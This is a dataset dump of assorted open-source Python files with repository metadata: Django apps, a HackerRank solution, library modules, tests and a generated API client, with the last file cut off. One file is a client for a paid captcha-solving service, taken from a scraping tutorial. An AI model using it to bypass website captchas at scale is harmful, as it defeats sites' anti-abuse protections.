blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
dbf95929d8d6ee23c4ba280b0087426af2f2d6a7 | f966c891c666db846d86406cb9c08a530902d032 | /algorithms/implementation/larrys_array.py | 463216acec541b8c6a7c8847fad3576cde14e85c | []
| no_license | rickharris-dev/hacker-rank | 36620a16894571e324422c83bd553440cf5bbeb1 | 2ad0fe4b496198bec1b900d2e396a0704bd0c6d4 | refs/heads/master | 2020-12-25T14:33:20.118325 | 2016-09-06T01:10:43 | 2016-09-06T01:10:43 | 67,264,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 553 | py | #!/usr/bin/python
t = int(raw_input().strip())
for i in range(0,t):
n = int(raw_input().strip())
a = map(int,raw_input().strip().split(' '))
inversions = 0
for j in range(0,n):
inversions += abs(a[j] - (j + 1))
while j > 0:
if a[j - 1] > a[j]:
swap = a[j]
a[j] = a[j - 1]
a[j - 1] = swap
inversions -= 1
j -= 1
else:
break
if inversions % 2 == 0:
print "YES"
else:
print "NO"
| [
"[email protected]"
]
| |
00100d269f830789446f2c2dec2b09e8f48e9b1a | 7823d31688879b2d4dcfd2e3c11fb2c862f35a23 | /image_retrieval/server/algorithm/__init__.py | 54615a50ab3d115940cbce7402700f464f4a7c66 | []
| no_license | FMsunyh/dlfive | 7637631f54520673e4ec417b3c02b5334ecdf026 | ffae48aac5ece4de5ff9afccc69b093a72e09637 | refs/heads/master | 2021-09-19T05:59:51.040214 | 2018-07-24T06:29:40 | 2018-07-24T06:29:40 | 108,929,499 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 12/7/2017 9:32 AM
# @Author : sunyonghai
# @File : __init__.py.py
# @Software: BG_AI
# ========================================================= | [
"[email protected]"
]
| |
9cdf17ae4fea3bd58bf6f8194f281cd060691c43 | 84cfe9b0ca7209487231e0725f7ad0d233f09544 | /stylemaster/urls.py | 75696e60c98bc0d947c8565e886e11919a73a7fd | []
| no_license | archit-dwevedi/M4Plan | 3eefc12ea447d624bae6f758c3648d7caf825c1a | d162592748ea37bc070b6217365e8601a6ccdd9a | refs/heads/master | 2021-10-26T23:22:04.456014 | 2019-04-14T20:02:17 | 2019-04-14T20:02:17 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,074 | py | from django.urls import path
from stylemaster import views
from M3_Project import settings
from django.conf.urls.static import static
urlpatterns=[
path('sample/', views.sample, name='sample'),
path('stylemaster/', views.style, name='style'),
path('stylefull/', views.stylefull, name='stylefull'),
path('fabric/', views.fabric, name='fabric'),
path('trims/', views.trims, name='trims'),
path('preview/',views.preview,name='preview'),
path('BOM_selection/',views.bom_select,name='bom_select'),
path('bomfill/',views.bomfill,name='bomfill'),
path('Bill_of_materials/',views.bom,name='bom'),
path('update/<int:pk>',views.update.as_view(),name='update'),
path('styleorder/',views.styleorder,name='styleorder'),
path('dash_styleorder/',views.dashorder,name='dash_styleorder'),
path('garment/',views.garmentitem,name='garment'),
path('dashgarment/',views.dashgarment,name='dashgarment'),
]
if settings.DEBUG:
urlpatterns+=static(settings.STATIC_URL,document_root=settings.STATICFILES_DIRS) | [
"[email protected]"
]
| |
cb45ff90aa4660fc5bccac79d5c77c74cb64959e | 76c50a9849b4093c6339dfeff888a5a0672a92bc | /yatsm/pipeline/_topology.py | c1ea0e9ff58ace0c4bec6246c61d26cf8edf1d40 | [
"MIT"
]
| permissive | valpasq/yatsm | d2fac9c7eea6f8a785d6c5b6c24196bb9f441db0 | 44e2124c1bae3dd4245437475d709187f52d376d | refs/heads/master | 2021-01-18T07:40:33.260515 | 2016-09-13T16:22:36 | 2016-09-13T16:22:36 | 40,021,588 | 0 | 0 | null | 2015-07-31T19:30:14 | 2015-07-31T19:30:14 | null | UTF-8 | Python | false | false | 4,509 | py | """ Build pipeline dependency graph from requirements
"""
from collections import defaultdict
import logging
import six
import toposort
from .language import OUTPUT, REQUIRE, PIPE
logger = logging.getLogger(__name__)
def format_deps(d):
""" Return formatted list of dependencies from 'requires'/'provides'
Transform as follows:
.. code-block:: python
>>> d = {
'data': ['red', 'nir', 'ndvi'],
'record': ['ccdc'],
}
>>> format_deps(d)
['data-red', 'data-nir', 'data-ndvi', 'record-ccdc']
Args:
d (dict): Task specification, requirements or provisions
Returns:
list: Formatted names of task dependencies
"""
out = []
for _type, names in six.iteritems(d):
out.extend(['%s-%s' % (_type, name) for name in names])
return out
def pipe_deps(pipe):
""" Format data and record in a `pipe`
Provides references to dataset bands and record information in `pipe`.
Args:
pipe (dict): A "pipeline" object containing `data` and `record` as
keys.
Returns:
dict: Dependency graph for data or results inside of `pipe`
"""
dsk = {PIPE: set()}
deps = {
'data': pipe['data'].keys(),
'record': pipe['record'].keys()
}
_deps = format_deps(deps)
for _dep in _deps:
dsk[_dep] = set([PIPE])
return dsk
def config_to_deps(config, dsk=None, overwrite=True):
""" Convert a pipeline specification into list of tasks
Args:
config (dict): Specification of pipeline tasks
dsk (dict): Optionally, provide a dictionary that already includes
some dependencies. The values of this dict should be sets.
overwrite (bool): Allow tasks to overwrite values that have already
been computed
Returns:
dict: Dependency graph
"""
dsk = defaultdict(set, dsk) if dsk else defaultdict(set)
for task, spec in config.items():
# from IPython.core.debugger import Pdb; Pdb().set_trace()
# Add in task requirements
deps = format_deps(spec[REQUIRE])
dsk[task] = dsk[task].union(deps)
# Add in data/record provided by task
prov = format_deps(spec[OUTPUT])
task_needed = False
for _prov in prov:
if overwrite or _prov not in dsk:
logger.debug('Adding task: {}'.format(task))
dsk[_prov].add(task)
task_needed = True
else:
logger.debug('Task already computed and not overwrite - not '
'adding: {}'.format(task))
# If this task didn't provide any new data/record, cull it
if not task_needed:
logger.debug('Culling task {} because everything it provides is '
'already calculated (e.g., from cache)'.format(task))
del dsk[task]
return dsk
def validate_dependencies(tasks, dsk):
""" Check that all required tasks are provided by `dsk`
Args:
tasks (Sequence[str]): Tasks to run, given in order of dependency
dsk (dict[str, set[str]]): Dependency graph
Returns:
list[str]: List of input tasks
Raises:
KeyError: Raise if not all dependencies are met
"""
# First validate the DAG
for task, deps in dsk.items():
check = [dep in dsk for dep in deps]
if not all(check):
missing = [dep for dep, ok in zip(deps, check) if not ok]
missing_str = ', '.join(['%i) "%s"' % (i + 1, m) for i, m in
enumerate(missing)])
raise KeyError('Task "{}" has unmet dependencies: {}'
.format(task, missing_str))
return tasks
def config_to_tasks(config, pipe, overwrite=True):
""" Return a list of tasks from a pipeline specification
Args:
config (dict): Pipeline specification
pipe (dict): Container storing `data` and `record` keys
overwrite (bool): Allow tasks to overwrite values that have already
been computed
Returns:
list: Tasks to run from the pipeline specification, given in the
order required to fullfill all dependencies
"""
_dsk = pipe_deps(pipe)
dsk = config_to_deps(config, dsk=_dsk, overwrite=overwrite)
tasks = [task for task in toposort.toposort_flatten(dsk)
if task in config.keys()]
return validate_dependencies(tasks, dsk)
| [
"[email protected]"
]
| |
4bcb2952ab0ade3293adefae13298275dbcebc72 | 562d4bf000dbb66cd7109844c972bfc00ea7224c | /addons/odoope_einvoice_base/__init__.py | b76d1966445c061ecc7fae89cd3e5df0d1312dda | []
| no_license | Mohamed33/odoo-efact-11-pos | e9da1d17b38ddfe5b2d0901b3dbadf7a76bd2059 | de38355aea74cdc643a347f7d52e1d287c208ff8 | refs/heads/master | 2023-03-10T15:24:44.052883 | 2021-03-06T13:25:58 | 2021-03-06T13:25:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,051 | py | # -*- coding: utf-8 -*-
###############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2009-TODAY Odoo Peru(<http://www.odooperu.pe>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import models
# eof:__init__.py
| [
"[email protected]"
]
| |
0a21c6b0ff04ff6534154bec8bff731a7f7907b5 | e60dd32858b162eb28e673ac9cfdb1b2a403c695 | /sysarg.py | 3e9a23ccdeb728110b5997db37732dd3a8d084f6 | []
| no_license | Hemanthtm2/playing_python | 8d3419a46d50b2801283aa020be89a8003d4ad31 | cb896916c6d84c564f7036a4ed6a2a5481bf2fd6 | refs/heads/master | 2020-05-23T13:10:51.753218 | 2019-02-20T21:52:34 | 2019-02-20T21:52:34 | 186,767,575 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | #!/usr/bin/python
import sys
script_name=sys.argv[0]
arguments=sys.argv[1:]
print(len(arguments))
| [
"[email protected]"
]
| |
967b0cd790a778ad56557cb88098e499ebd5e7e5 | 4be96ec1670297ae71efa6c5c4a830255f893743 | /Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/conda/_vendor/frozendict.py | eeeebf38e22db3bbdce97652812fe2fe6057657f | [
"LicenseRef-scancode-python-cwi",
"GPL-1.0-or-later",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-free-unknown",
"Python-2.0",
"Apache-2.0",
"BSD-3-Clause",
"MIT"
]
| permissive | zooba/PTVS | 7dbcc0165ded98d077040a6b367fd71a1eb1e6bd | 0c213e901168fee368a32939256174077a8d4dfa | refs/heads/master | 2021-05-23T03:58:11.007138 | 2021-01-26T00:20:40 | 2021-01-26T00:20:40 | 42,481,352 | 1 | 0 | Apache-2.0 | 2018-11-19T19:30:24 | 2015-09-14T22:47:51 | C# | UTF-8 | Python | false | false | 2,909 | py | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Santiago Lezica
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this
# software and associated documentation files (the "Software"), to deal in the Software
# without restriction, including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
# FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# source: https://raw.githubusercontent.com/slezica/python-frozendict/c5d16bafcca7b72ff3e8f40d3a9081e4c9233f1b/frozendict/__init__.py
# version: 1.2
# date: 2018-06-29
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
try:
from collections import OrderedDict
except ImportError: # python < 2.7
OrderedDict = NotImplemented
iteritems = getattr(dict, 'iteritems', dict.items) # py2-3 compatibility
class frozendict(Mapping):
"""
An immutable wrapper around dictionaries that implements the complete :py:class:`collections.Mapping`
interface. It can be used as a drop-in replacement for dictionaries where immutability is desired.
"""
dict_cls = dict
def __init__(self, *args, **kwargs):
self._dict = self.dict_cls(*args, **kwargs)
self._hash = None
def __getitem__(self, key):
return self._dict[key]
def __contains__(self, key):
return key in self._dict
def copy(self, **add_or_replace):
return self.__class__(self, **add_or_replace)
def __iter__(self):
return iter(self._dict)
def __len__(self):
return len(self._dict)
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, self._dict)
def __hash__(self):
if self._hash is None:
h = 0
for key, value in iteritems(self._dict):
h ^= hash((key, value))
self._hash = h
return self._hash
def __json__(self):
# Works with auxlib's EntityEncoder.
return self._dict
class FrozenOrderedDict(frozendict):
"""
A frozendict subclass that maintains key order
"""
dict_cls = OrderedDict
if OrderedDict is NotImplemented:
del FrozenOrderedDict
| [
"[email protected]"
]
| |
25af442b950800e054a759cc21320c8ce9953edf | 172c00532812041f491ccea4a548401e9148864c | /feedback_form/urls.py | 8d80bbe0d2024471abdb62d308c7f902f5008db9 | []
| no_license | henokali1/FANS-feedback-form | 34830f5d7740f3578b13e5d8f46e2372492e0733 | ab15cc736571ff55a06ea3e6275428077ef08fde | refs/heads/master | 2020-04-09T02:29:05.240720 | 2018-12-04T03:23:32 | 2018-12-04T03:23:32 | 159,942,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 738 | py | from django.contrib import admin
from django.urls import path, include
from django.views.generic.base import TemplateView
from trainee_feedback.views import feedback_view, add_feedback_view, thankyou_view, trainer_view, report_view, feedback_detail_view
urlpatterns = [
path('', TemplateView.as_view(template_name='home.html'), name='home'),
path('admin/', admin.site.urls),
path('users/', include('users.urls')),
path('users/', include('django.contrib.auth.urls')),
path('feedback/', feedback_view),
path('add_feedback/', add_feedback_view),
path('thankyou/', thankyou_view),
path('trainer/', trainer_view),
path('report/', report_view),
path('feedback_detail/<int:pk>/', feedback_detail_view),
]
| [
"[email protected]"
]
| |
fc2d3910ce1955870202ad5072111d79369813a1 | 48ca6f9f041a1e9f563500c8a7fa04dbb18fa949 | /tests/lib/cast/test_to_int.py | 020a6156975f87a7f23d58cb567094342d837c05 | [
"MIT"
]
| permissive | bogdanvuk/pygears | 71404e53d4689ec9cdd9db546bfc0f229a7e02da | 705b11ab6de79868b25753fa9d0ce7128791b346 | refs/heads/master | 2023-07-08T11:38:54.625172 | 2022-03-07T12:29:00 | 2022-03-07T12:29:00 | 124,890,922 | 146 | 16 | MIT | 2022-08-15T07:57:08 | 2018-03-12T13:10:06 | Python | UTF-8 | Python | false | false | 1,605 | py | import pytest
from pygears.typing import Int, Tuple, Ufixp, Uint, cast
def test_ufixp_type_cast():
assert cast(Ufixp[8, 16], Int) == Int[9]
assert cast(Ufixp[8, 16], Int[16]) == Int[16]
assert cast(Ufixp[16, 8], Int) == Int[17]
with pytest.raises(TypeError):
cast(Ufixp[-1, 16], Int)
def test_ufixp_value_cast():
assert cast(Ufixp[8, 16](2.15), Int) == Int[9](2)
assert cast(Ufixp[8, 16](2.15), Int[16]) == Int[16](2)
with pytest.raises(TypeError):
cast(Ufixp[-1, 16](0.15), Int)
assert cast(Ufixp[-1, 16](0.15), Int[16]) == Int[16](0)
with pytest.raises(TypeError):
cast(Ufixp[8, 16](56.15), Int[8])
def test_uint_type_cast():
assert cast(Uint[8], Int) == Int[9]
assert cast(Uint[8], Int[16]) == Int[16]
with pytest.raises(TypeError):
cast(Uint[8], Int[8])
assert cast(Int[8], Int) == Int[8]
assert cast(Int[8], Int[16]) == Int[16]
with pytest.raises(TypeError):
cast(Int[8], Int[4])
def test_number_value_cast():
assert cast(Uint[8](128), Int[16]) == Int[16](128)
assert cast(Int[8](127), Int[8]) == Int[8](127)
with pytest.raises(TypeError):
cast(Uint[16](128), Int[16])
with pytest.raises(TypeError):
cast(Int[16](-128), Int[8])
assert cast(2.15, Int[4]) == Int[4](2)
assert cast(7, Int[4]) == Int[4](7)
assert cast(-8, Int[4]) == Int[4](-8)
with pytest.raises(ValueError):
cast(-9, Int[4])
def test_unsupported_cast():
for t in [Tuple[Int[2], Uint[2]]]:
with pytest.raises(TypeError):
cast(t, Int)
| [
"[email protected]"
]
| |
a9add2a2807b26acdea921f6e43d510209324db8 | 7b2d14f78099fde6c4a35082c9c294d1771cb163 | /Week 12/templates/paint.py | e9129563cd2af70c80bb773c5f863d15f03febb8 | []
| no_license | pinardy/Digital-World | 04c6ddb369ede7295a0891aaaa006486c557965e | dd0a351eb64f05b524b08c47cd0c0ad3eadd775c | refs/heads/master | 2020-12-30T22:45:02.448171 | 2018-01-30T03:06:08 | 2018-01-30T03:06:08 | 80,622,946 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,281 | py | from random import random
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from kivy.graphics import Color, Line, Rectangle
from kivy.uix.filechooser import FileChooserListView, FileChooserIconView
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
class MyBackground(Widget):
def __init__(self, **kwargs):
super(MyBackground, self).__init__(**kwargs)
with self.canvas:
self.bg = Rectangle(source='water.png', pos=self.pos, size=self.size)
self.bind(pos=self.update_bg)
self.bind(size=self.update_bg)
def update_bg(self, *args):
self.bg.pos = self.pos
self.bg.size = self.size
class MyPaintWidget(Widget):
def on_touch_down(self, touch):
color = (random(), random(), random())
with self.canvas:
Color(*color)
d = 30.
touch.ud['line'] = Line(points=(touch.x, touch.y))
def on_touch_move(self, touch):
touch.ud['line'].points += [touch.x, touch.y]
class MyPaintApp(App):
def build(self):
parent = MyBackground()
painter = MyPaintWidget()
parent.add_widget(painter)
return parent
if __name__ == '__main__':
MyPaintApp().run() | [
"[email protected]"
]
| |
a56accc8bb039caa306a869de4e06b475ff2da4e | 0669d94428c972da19346e356861bf11bd668bc9 | /swagger_client/models/listenoire_reponse.py | 371bc0bc9cc54f00a8cea83fb5cd140194c384cf | []
| no_license | mlemee/iSendProPython | e9a0f8351e33ae7598bd1380a26c2fe0a1dacd22 | 3add878dbcd682aa41f2bd07f98d8b56c8e5f9f3 | refs/heads/master | 2022-06-10T02:27:12.368498 | 2020-05-04T15:48:13 | 2020-05-04T15:48:13 | 261,206,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,925 | py | # coding: utf-8
"""
API iSendPro
[1] Liste des fonctionnalités : - envoi de SMS à un ou plusieurs destinataires, - lookup HLR, - récupération des récapitulatifs de campagne, - gestion des répertoires, - ajout en liste noire. - comptage du nombre de caractères des SMS [2] Pour utiliser cette API vous devez: - Créer un compte iSendPro sur https://isendpro.com/ - Créditer votre compte - Remarque: obtention d'un crédit de test possible sous conditions - Noter votre clé de compte (keyid) - Elle vous sera indispensable à l'utilisation de l'API - Vous pouvez la trouver dans le rubrique mon \"compte\", sous-rubrique \"mon API\" - Configurer le contrôle IP - Le contrôle IP est configurable dans le rubrique mon \"compte\", sous-rubrique \"mon API\" - Il s'agit d'un système de liste blanche, vous devez entrer les IP utilisées pour appeler l'API - Vous pouvez également désactiver totalement le contrôle IP # noqa: E501
OpenAPI spec version: 1.1.1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from swagger_client.models.listenoire_reponse_etat import LISTENOIREReponseEtat # noqa: F401,E501
class LISTENOIREReponse(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'etat': 'LISTENOIREReponseEtat'
}
attribute_map = {
'etat': 'etat'
}
def __init__(self, etat=None): # noqa: E501
"""LISTENOIREReponse - a model defined in Swagger""" # noqa: E501
self._etat = None
self.discriminator = None
if etat is not None:
self.etat = etat
@property
def etat(self):
"""Gets the etat of this LISTENOIREReponse. # noqa: E501
:return: The etat of this LISTENOIREReponse. # noqa: E501
:rtype: LISTENOIREReponseEtat
"""
return self._etat
@etat.setter
def etat(self, etat):
"""Sets the etat of this LISTENOIREReponse.
:param etat: The etat of this LISTENOIREReponse. # noqa: E501
:type: LISTENOIREReponseEtat
"""
self._etat = etat
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, LISTENOIREReponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
]
| |
added45d9f890ae16299a1fb849752c08c2c61d8 | 2e70b3ce93762c5b66fba57f8b9cba37aacf0702 | /new/jamah/views.py | 1f7fc766792333f3fa42f0bba092105be267c21e | []
| no_license | mahidul-islam/jamah | 02be511fe119e8934ec7d5aa1eaa8e2b24fad246 | c8ddf9a8094d33e8b1d6cb834eab3d9f18b1a9ea | refs/heads/master | 2022-05-13T15:11:38.609550 | 2019-06-08T04:52:09 | 2019-06-08T04:52:09 | 184,331,276 | 2 | 0 | null | 2022-04-22T21:27:18 | 2019-04-30T21:04:06 | Python | UTF-8 | Python | false | false | 6,444 | py | from django.shortcuts import render
from django.template import loader
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse
from django.utils import timezone
from django.contrib import messages
from .forms import JamahCreateForm
from event.forms import EventCreateForm
from .models import Jamah, JamahMember
from user.models import MyUser
from event.models import Event, EventMember
from account.models import Account
def index(request):
template = loader.get_template('jamah/index.html')
if request.user.is_authenticated:
form = JamahCreateForm()
jamah_by_me = Jamah.objects.filter(creator = request.user)
jamah_by_all = request.user.jamahs_of_you.all()
all_jamah = Jamah.objects.all()
# print(jamah_by_all)
# print('-----------------------------------------------------------------')
context = {
'form': form,
'jamah_by_me': jamah_by_me,
'jamah_by_all': jamah_by_all,
}
return HttpResponse(template.render(context, request))
else:
context = {}
messages.info(request, 'Please Log in to use this feature')
return HttpResponse(template.render(context, request))
def detail(request, jamah_id):
jamah = Jamah.objects.get(pk = jamah_id)
jamahmembers = jamah.members.all()
events = jamah.events.all()
template = loader.get_template('jamah/detail.html')
form = EventCreateForm()
context = {
'eventForm': form,
'events': events,
'jamah': jamah,
}
return HttpResponse(template.render(context, request))
def alljamah(request):
template = loader.get_template('jamah/jamahs.html')
if request.user.is_authenticated:
form = JamahCreateForm()
all_jamah = Jamah.objects.all()
context = {
'form': form,
'all_jamah': all_jamah,
}
return HttpResponse(template.render(context, request))
else:
context = {}
messages.info(request, 'Please Log in to use this feature')
return HttpResponse(template.render(context, request))
def join_jamah(request, jamah_id):
jamah = Jamah.objects.get(pk = jamah_id)
# test if he requested already
jamahMember = JamahMember.objects.filter(member = request.user).filter(jamah = jamah)
if jamahMember.count():
jamahMember = jamahMember[0]
if jamahMember.still_to_be_excepted:
messages.success(request, 'You already requested to join !!!')
return HttpResponseRedirect(reverse('jamah:all_jamah'))
else:
messages.success(request, 'You already are a Member !!!')
return HttpResponseRedirect(reverse('jamah:all_jamah'))
else:
# user didnot requested before so create jamahMember
jamah.requested_to_join.add(request.user)
jamah.save()
account = Account(description = 'Jamah: ' + jamah.jamahname + ' ' + ' ,Member: ' + request.user.username)
account.save()
jamahMember = JamahMember(member=request.user, jamah=jamah, status='member', account=account).save()
messages.success(request, 'You requested to join the Group')
return HttpResponseRedirect(reverse('jamah:all_jamah'))
def create(request):
name = request.POST['jamahname']
account = Account(description = 'Jamah: ' + name + '\'s account')
account.save()
jamah = Jamah(jamahname = name, creator = request.user, account=account)
jamah.save()
jamah.members.add(request.user)
jamah.save()
account2 = Account(description = 'Jamah: ' + name + ' ' + ' ,Member: ' + request.user.username)
account2.save()
jamahMember = JamahMember(
member = request.user,
jamah = jamah,
status = 'creator',
still_to_be_excepted = False,
account = account2
).save()
# print(jamahMember)
return HttpResponseRedirect(reverse('jamah:all_jamah'))
def save_member(request, jamah_id, jamahmember_id):
jamah = Jamah.objects.get(pk = jamah_id)
jamahmember = JamahMember.objects.get(pk = jamahmember_id)
jamahmember.still_to_be_excepted = False
jamah.members.add(jamahmember.member)
jamah.requested_to_join.remove(jamahmember.member)
jamahmember.timestamp = timezone.now()
jamah.save()
jamahmember.save()
return HttpResponseRedirect(reverse('jamah:detail', args = (jamah_id,)))
def remove_member(request, jamah_id, member_id):
jamah = Jamah.objects.get(pk = jamah_id)
member = MyUser.objects.get(pk = member_id)
jamahmember = JamahMember.objects.get(jamah=jamah, member=member)
jamahmember.account.delete()
jamahmember.delete()
jamah.members.remove(member)
# print(event.members.all())
return HttpResponseRedirect(reverse('event:detail', args = (event_id,)))
def promote_member(request, jamah_id, member_id):
jamah = Jamah.objects.get(pk = jamah_id)
member = MyUser.objects.get(pk = member_id)
jamahmember = JamahMember.objects.get(jamah=jamah, member=member)
if jamahmember.status == 'member':
jamahmember.status = 'admin'
elif jamahmember.status == 'admin':
jamahmember.status = 'modarator'
jamahmember.save()
# print(event.members.all())
return HttpResponseRedirect(reverse('event:detail', args = (event_id,)))
def create_jamah_event(request, jamah_id):
jamah = Jamah.objects.get(pk = jamah_id)
name = request.POST['name']
messages.success(request, 'Added a Event for the jamah...')
account = Account(description = 'Event: ' + name + '\'s account')
account.save()
cost_account = Account(description = 'Event: ' + name + '\'s cost account')
cost_account.save()
event = Event(name = name, creator = request.user, account = account, jamah=jamah, cost_account=cost_account)
event.save()
event.members.add(request.user)
event.save()
member_account = Account(description = 'Event: ' + name + ' ' + ' ,Member: ' + request.user.username)
member_account.mother_account = event.account
member_account.save()
eventMember = EventMember(
member = request.user,
event = event,
status = 'creator',
accountant_account = member_account,
is_accountant = True,
is_head_accountant = True,
is_cost_observer = True,
).save()
return HttpResponseRedirect(reverse('jamah:detail', args = (jamah_id,)))
| [
"[email protected]"
]
| |
049aca3df698e02af2e577d8085b003078f81c03 | 187af52e7f5150a5341aaf0c245baefa5e44d2e0 | /爬虫/第八章/3.点触验证码的识别/captach.py | 713d7a21412eef592285e25417c0dcf1c2c798b6 | []
| no_license | ShaoLay/Python_PaChong | ea9bc3880daf5d775f214017184d70a63cd1130a | 97db513ee07a14e07afa785628864d46cdb9ad03 | refs/heads/master | 2020-04-07T16:58:29.916471 | 2018-12-17T07:02:12 | 2018-12-17T07:02:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,389 | py | import requests
from hashlib import md5
class Chaojiying(object):
def __init__(self, username, password, soft_id):
self.username = username
self.password = md5(password.encode('utf-8')).hexdigest()
self.soft_id = soft_id
self.base_params = {
'user': self.username,
'pass2': self.password,
'softid': self.soft_id,
}
self.headers = {
'Connection': 'Keep-Alive',
'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
}
def post_pic(self, im, codetype):
"""
im: 图片字节
codetype: 题目类型 参考 http://www.chaojiying.com/price.html
"""
params = {
'codetype': codetype,
}
params.update(self.base_params)
files = {'userfile': ('ccc.jpg', im)}
r = requests.post('http://upload.chaojiying.net/Upload/Processing.php', data=params, files=files,
headers=self.headers)
return r.json()
def report_error(self, im_id):
"""
im_id:报错题目的图片ID
"""
params = {
'id': im_id,
}
params.update(self.base_params)
r = requests.post('http://upload.chaojiying.net/Upload/ReportError.php', data=params, headers=self.headers)
return r.json()
| [
"[email protected]"
]
| |
0fafd36ef08142b623213dd91d2bc34c83e31bda | 0191d4695198ecc61ef9f599c07b3372e7ff10b8 | /album/views.py | 7ef7db17cbee57b293dad8a4b3bbbe31fc1e1298 | []
| no_license | caioaraujo/discoteka | f22ba641e57b40da2dd08ec1f6c4925699a7d89b | a44ffbe23ce1b36bcc8ad1287db3de13e995705a | refs/heads/master | 2021-01-20T00:36:47.631669 | 2017-05-06T14:34:20 | 2017-05-06T14:34:20 | 89,159,473 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,132 | py | from rest_framework.response import Response
from rest_framework.views import APIView
from album.models import Album as AlbumModel
from album.serializers import AlbumSerializer
from artista.models import Artista as ArtistaModel
from discoteka.exceptions import RegistroNaoEncontradoException, ValorObrigatorioException
class Album(APIView):
def post(self, request):
data = request.data
self.valida_preenchimento(data)
artista_id = data.get('artista')
self.valida_artista(artista_id)
album = AlbumModel()
album.nome = data.get('nome')
album.artista_id = data.get('artista')
album.ano_lancamento = data.get('ano_lancamento')
album.faixas = data.get('faixas')
album.save()
serializer = AlbumSerializer(album)
return Response(serializer.data)
def get(self, request):
albuns = AlbumModel.objects.filter(artista_id=request.GET.get('artista')).all()
serializer = AlbumSerializer(albuns, many=True)
return Response(serializer.data)
def valida_artista(self, artista_id):
artista = ArtistaModel.get_artista_por_id(pk=artista_id)
if not artista:
